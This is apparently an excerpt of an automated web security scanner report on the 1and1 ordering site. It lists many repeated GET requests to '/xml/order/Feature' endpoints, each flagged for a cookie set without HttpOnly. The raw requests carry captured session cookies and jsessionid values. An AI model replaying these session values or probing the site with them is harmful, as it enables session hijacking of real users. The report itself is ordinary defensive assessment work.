GET /xml/order/FeatureServerProcessor HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2ee9ff185893a000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerRecovery HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2c6856928977d800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerSsl HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3f8e9c0500a60000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerVpsOsLinux HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=517ca537a4bc3c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerVpsOsWindows HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=23f729c028981800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingAsp HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=243737f9e62df400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingBlog HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=27a6c0dfbabd7800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCgi HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=e60106dc2a1f800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCnba HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3451d6a5fb8ed000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingContentmoduls HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingContentmoduls;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3cd2f340f5d83400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDriving HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDriving;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=6f93047c1ec73800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDsc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2e6b9e6419f16800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingElements HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMailinglist;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=19d9d648f2500000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMailinglist HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=9f2e578a0ee4400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMap HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=6f0d5596d7138000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingNet HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=625c83a492d9a400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingPhotogallery HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingRss;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=413ff73ef856c000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingRss HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=140b368813868c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingWsb HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5729a5342aeda400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureToolsRatepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureToolsRatepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3348408536a8e000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebdesignIstock HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureWebdesignIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
